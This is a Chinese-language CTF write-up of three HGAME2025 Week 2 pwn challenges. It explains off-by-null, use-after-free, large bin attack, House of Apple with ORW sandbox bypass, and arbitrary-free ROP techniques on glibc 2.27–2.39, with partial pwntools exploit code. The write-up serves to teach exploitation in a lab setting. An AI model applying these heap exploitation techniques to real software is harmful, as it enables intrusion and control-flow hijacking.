HGAME2025 Week2 Pwn题全解析<\/h1>

题目1: sign2heap<\/h2>

题目概述<\/h3>
保护机制：全开<\/li>
Libc版本：2.27（已开启tcache bin）<\/li>
漏洞类型：Off-by-null<\/li> <\/ul>
环境准备<\/h3>
使用patchelf将libc-2.27.so和ld.so链接到程序上：<\/p>
patchelf --replace-needed libc.so.6 .\/libc-2.27.so .\/vuln
<\/span><\/span>patchelf --set-interpreter .\/ld.so .\/vuln
<\/span><\/span><\/code><\/pre>程序分析<\/h3>


功能一<\/strong>：创建堆块<\/p>

最多创建16个堆块<\/li>
堆块大小不超过0xff<\/li>
漏洞点：read输入后会将最后一字节设置为'\x00'，导致off-by-null漏洞<\/li>
<\/ul>
<\/li>

功能二<\/strong>：删除堆块（menu函数写反了）<\/p>

正常释放堆块并将指针清零<\/li>
无漏洞<\/li>
<\/ul>
<\/li>

功能三<\/strong>：打印堆块内容<\/p>
<\/li>
<\/ol>
利用思路<\/h3>


堆布局：<\/p>

创建0x80大小的堆块1<\/li>
创建0x18大小的堆块2（用于off-by-null）<\/li>
创建0xf0大小的堆块3<\/li>
创建7个0x80和7个0xf0堆块填满tcache<\/li>
<\/ul>
<\/li>

利用off-by-null：<\/p>

释放堆块1<\/li>
使用堆块2修改堆块3的pre_size和size位<\/li>
<\/ul>
<\/li>

合并堆块：<\/p>

释放堆块3，使其与堆块1、堆块2合并<\/li>
<\/ul>
<\/li>

泄露libc地址：<\/p>

申请8个0x80大小堆块，使main_arena落入堆块1<\/li>
show堆块1泄露libc地址<\/li>
<\/ul>
<\/li>

最终利用：<\/p>

申请0x10大小堆块制造double free<\/li>
修改fd指向malloc_hook<\/li>
写入one_gadget<\/li>
<\/ul>
<\/li>
<\/ol>
EXP关键代码<\/h3>
# 堆布局<\/span>
<\/span><\/span>add(0<\/span>, 0x80<\/span>, b<\/span>'A'<\/span>*<\/span>0x80<\/span>)
<\/span><\/span>add(1<\/span>, 0x18<\/span>, b<\/span>'B'<\/span>*<\/span>0x18<\/span>)
<\/span><\/span>add(2<\/span>, 0xf0<\/span>, b<\/span>'C'<\/span>*<\/span>0xf0<\/span>)
<\/span><\/span>
<\/span><\/span># 填满tcache<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    add(3<\/span>+<\/span>i, 0x80<\/span>, b<\/span>'D'<\/span>*<\/span>0x80<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    add(10<\/span>+<\/span>i, 0xf0<\/span>, b<\/span>'E'<\/span>*<\/span>0xf0<\/span>)
<\/span><\/span>
<\/span><\/span># 释放堆块1并利用off-by-null<\/span>
<\/span><\/span>delete(0<\/span>)
<\/span><\/span>payload =<\/span> b<\/span>'B'<\/span>*<\/span>0x10<\/span> +<\/span> p64(0x90<\/span> +<\/span> 0x20<\/span>)
<\/span><\/span>add(1<\/span>, 0x18<\/span>, payload)
<\/span><\/span>
<\/span><\/span># 释放堆块3触发合并<\/span>
<\/span><\/span>delete(2<\/span>)
<\/span><\/span>
<\/span><\/span># 泄露libc<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    delete(3<\/span>+<\/span>i)
<\/span><\/span>for<\/span> i in<\/span> range(8<\/span>):
<\/span><\/span>    add(3<\/span>+<\/span>i, 0x80<\/span>, b<\/span>'F'<\/span>*<\/span>0x80<\/span>)
<\/span><\/span>show(0<\/span>)
<\/span><\/span><\/code><\/pre>题目2: Where is the vulnerability<\/h2>
题目概述<\/h3>

保护机制：全开（除canary）<\/li>
Libc版本：2.39<\/li>
额外文件：libhgame.so<\/li>
沙箱限制：禁用execve（需ORW）<\/li>
<\/ul>
环境准备<\/h3>
patchelf --replace-needed libc.so.6 .\/libc-2.39.so .\/vuln
<\/span><\/span>patchelf --set-interpreter .\/ld.so .\/vuln
<\/span><\/span>chmod +x libhgame.so libc-2.39.so ld.so
<\/span><\/span><\/code><\/pre>程序分析<\/h3>


沙箱限制<\/strong>：在libhgame.so的init函数中禁用了execve<\/p>
<\/li>

功能一<\/strong>：创建堆块<\/p>

最多16个堆块<\/li>
大小范围0x500-0x900（unsorted bin范围）<\/li>
<\/ul>
<\/li>

功能二<\/strong>：释放堆块<\/p>

存在Use-after-free漏洞（指针未清零）<\/li>
<\/ul>
<\/li>

功能三\/四<\/strong>：修改\/打印堆块内容<\/p>
<\/li>
<\/ol>
利用思路<\/h3>


堆布局：<\/p>

创建0x518大小的堆块1<\/li>
创建堆块2防止合并<\/li>
创建0x508大小的堆块3（用于large bin attack）<\/li>
创建堆块4防止合并<\/li>
<\/ul>
<\/li>

泄露地址：<\/p>

释放堆块1进入unsorted bin<\/li>
申请0x530堆块使堆块1进入large bin<\/li>
利用UAF泄露libc和heap地址<\/li>
<\/ul>
<\/li>

Large bin attack：<\/p>

释放堆块3进入unsorted bin<\/li>
伪造堆块1的bk_nextsize为_IO_list_all-0x20<\/li>
申请0x528堆块触发攻击<\/li>
<\/ul>
<\/li>

House of Apple：<\/p>

利用伪造的IO_FILE结构体进行ORW<\/li>
<\/ul>
<\/li>
<\/ol>
EXP关键代码<\/h3>
# 堆布局<\/span>
<\/span><\/span>add(0<\/span>, 0x518<\/span>, b<\/span>'A'<\/span>*<\/span>0x518<\/span>)
<\/span><\/span>add(1<\/span>, 0x18<\/span>, b<\/span>'B'<\/span>*<\/span>0x18<\/span>)
<\/span><\/span>add(2<\/span>, 0x508<\/span>, b<\/span>'C'<\/span>*<\/span>0x508<\/span>)
<\/span><\/span>add(3<\/span>, 0x18<\/span>, b<\/span>'D'<\/span>*<\/span>0x18<\/span>)
<\/span><\/span>
<\/span><\/span># 泄露libc<\/span>
<\/span><\/span>delete(0<\/span>)
<\/span><\/span>add(4<\/span>, 0x530<\/span>, b<\/span>'E'<\/span>*<\/span>0x530<\/span>)
<\/span><\/span>show(0<\/span>)
<\/span><\/span>
<\/span><\/span># Large bin attack<\/span>
<\/span><\/span>delete(2<\/span>)
<\/span><\/span>payload =<\/span> p64(0<\/span>)*<\/span>3<\/span> +<\/span> p64(libc.<\/span>sym.<\/span>_IO_list_all -<\/span> 0x20<\/span>)
<\/span><\/span>edit(0<\/span>, payload)
<\/span><\/span>add(5<\/span>, 0x528<\/span>, b<\/span>'F'<\/span>*<\/span>0x528<\/span>)
<\/span><\/span>
<\/span><\/span># House of Apple<\/span>
<\/span><\/span>fake_file =<\/span> IO_FILE_plus()
<\/span><\/span># 设置伪造的IO_FILE结构体<\/span>
<\/span><\/span><\/code><\/pre>题目3: Hit list<\/h2>
题目概述<\/h3>

保护机制：全开<\/li>
Libc版本：2.35<\/li>
特殊功能：gift函数（一次任意地址free）<\/li>
<\/ul>
程序分析<\/h3>


节点结构<\/strong>：<\/p>

"结构堆块"：包含节点下标、下一个结构地址、number值、内容堆块地址<\/li>
"内容堆块"：前8字节为name，后面为用户输入内容<\/li>
<\/ul>
<\/li>

gift函数<\/strong>：<\/p>

创建-9大小堆块时触发<\/li>
提供一次任意地址free机会<\/li>
<\/ul>
<\/li>

功能一<\/strong>：创建节点<\/p>
<\/li>

功能二<\/strong>：删除节点<\/p>
<\/li>

功能三<\/strong>：修改节点内容<\/p>
<\/li>

功能四<\/strong>：打印节点内容<\/p>
<\/li>
<\/ol>
利用思路<\/h3>


泄露heap地址：<\/p>

释放"结构堆块"后申请回来作为"内容堆块"<\/li>
通过打印泄露heap地址<\/li>
<\/ul>
<\/li>

泄露libc地址：<\/p>

释放8个unsorted bin大小堆块<\/li>
申请回来泄露fd\/bk中的libc地址<\/li>
<\/ul>
<\/li>

利用gift函数：<\/p>

释放tcache_perthread_struct<\/li>
申请回来伪造释放environ<\/li>
获取stack地址<\/li>
<\/ul>
<\/li>

ROP链构造：<\/p>

将函数返回地址写入tcache_perthread_struct<\/li>
申请回来写入ROP链<\/li>
<\/ul>
<\/li>
<\/ol>
EXP关键代码<\/h3>
# 泄露heap地址<\/span>
<\/span><\/span>add(0<\/span>, 0x100<\/span>, b<\/span>'A'<\/span>*<\/span>0x100<\/span>)
<\/span><\/span>delete(0<\/span>)
<\/span><\/span>add(1<\/span>, 0x100<\/span>, p64(0<\/span>)*<\/span>3<\/span> +<\/span> p64(0x21<\/span>))
<\/span><\/span>show(0<\/span>)
<\/span><\/span>
<\/span><\/span># 泄露libc地址<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(8<\/span>):
<\/span><\/span>    add(2<\/span>+<\/span>i, 0x500<\/span>, b<\/span>'B'<\/span>*<\/span>0x500<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(8<\/span>):
<\/span><\/span>    delete(2<\/span>+<\/span>i)
<\/span><\/span>add(10<\/span>, 0x500<\/span>, b<\/span>'C'<\/span>*<\/span>8<\/span>)
<\/span><\/span>show(10<\/span>)
<\/span><\/span>
<\/span><\/span># 利用gift函数<\/span>
<\/span><\/span>add(11<\/span>, -<\/span>9<\/span>, p64(heap_base +<\/span> 0x10<\/span>))
<\/span><\/span>add(12<\/span>, 0x100<\/span>, p64(libc.<\/span>sym.<\/span>environ))
<\/span><\/span>show(12<\/span>)
<\/span><\/span>
<\/span><\/span># 构造ROP链<\/span>
<\/span><\/span>rop =<\/span> ROP(libc)
<\/span><\/span># 设置ROP链内容<\/span>
<\/span><\/span><\/code><\/pre>总结<\/h2>


sign2heap<\/strong>：利用off-by-null进行堆合并，通过tcache机制泄露地址并劫持控制流<\/p>
<\/li>

Where is the vulnerability<\/strong>：在libc 2.39环境下，利用large bin attack结合house of apple绕过沙箱限制<\/p>
<\/li>

Hit list<\/strong>：利用特殊的一次任意地址free机会，通过精心设计的堆布局泄露关键地址并最终构造ROP链<\/p>
<\/li>
<\/ol>
关键点：<\/p>

不同libc版本下的利用技术差异<\/li>
沙箱绕过技术（ORW）<\/li>
堆布局和地址泄露技巧<\/li>
一次任意地址free的高效利用<\/li>
<\/ul>